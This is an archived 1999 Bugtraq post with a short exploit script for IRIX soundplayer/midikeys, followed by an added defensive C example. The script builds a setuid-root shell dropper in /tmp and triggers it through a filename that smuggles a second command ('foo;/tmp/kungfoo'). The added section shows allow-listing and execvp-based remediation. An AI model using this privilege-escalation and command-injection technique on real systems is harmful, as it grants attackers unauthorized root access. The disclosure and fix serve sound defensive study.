[13169] in bugtraq


irix-soundplayer.sh

daemon@ATHENA.MIT.EDU (Loneguard)
Fri Dec 31 13:22:19 1999

Message-Id:  <19991231112220.B283C1FA59@lists.securityfocus.com>
Date:         Fri, 31 Dec 1999 03:22:20 -0800
Reply-To: Loneguard <loneguard@CRAZYMONKEY.ORG>
From: Loneguard <loneguard@CRAZYMONKEY.ORG>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

midikeys might not be setuid these days, but you get the idea...

#!/bin/sh
#
# Irix 6.x soundplayer xploit - Loneguard 20/02/99
#
# Good example of how bad coding in a non-setuid/priviledged process
# can offer up rewt
#
cat > /tmp/crazymonkey.c << 'EOF'
main() {
	setuid(0);
	system("cp /bin/csh /tmp/xsh;chmod 4755 /tmp/xsh");
}
EOF
cc -o /tmp/kungfoo crazymonkey.c
/usr/sbin/midikeys &
echo "You should now see the midikeys window, goto the menu that allows you to play sounds and load a wav. This will bring up a soundplayer window. Save the wav as 'foo;/tmp/kungfoo' and go find a rewt shell in tmp"
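An added example, not part of the original post and not SGI's code: the save name above only matters if the filename reaches a shell, which is an assumption here because soundplayer's source is not shown. The hypothetical `name_is_safe` and `run_helper` below show the defensive pattern for any helper launched with inherited privileges: allow-list the name and pass it as a single argv element so no shell ever parses it.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allow-list for a user-supplied save name: ASCII letters, digits, '.', '_'
 * and '-' only, no leading '.' or '-', no path separators, 1..255 bytes. */
int name_is_safe(const char *name) {
    size_t n = strlen(name);
    if (n == 0 || n > 255 || name[0] == '-' || name[0] == '.')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-'))
            return 0;
    }
    return 1;
}

/* Run `helper` (hypothetical external program) with the name as one argv
 * element. Nothing here goes through system() or /bin/sh, so ';', '|', '`'
 * and '$' are never interpreted. Returns the exit status, or -1 if the name
 * is rejected or the child could not be run. */
int run_helper(const char *helper, const char *name) {
    if (!name_is_safe(name))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)helper, "--", (char *)name, NULL };
        execvp(helper, argv);
        _exit(127);              /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed inputs: one ordinary name and the name from the message. */
    printf("take1.wav        -> %d\n", run_helper("true", "take1.wav"));
    printf("foo;/tmp/kungfoo -> %d\n", run_helper("true", "foo;/tmp/kungfoo"));
    return 0;
}
```

A privileged parent should also drop its effective uid before launching any helper, so that a flaw in the helper does not run with the parent's privileges.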
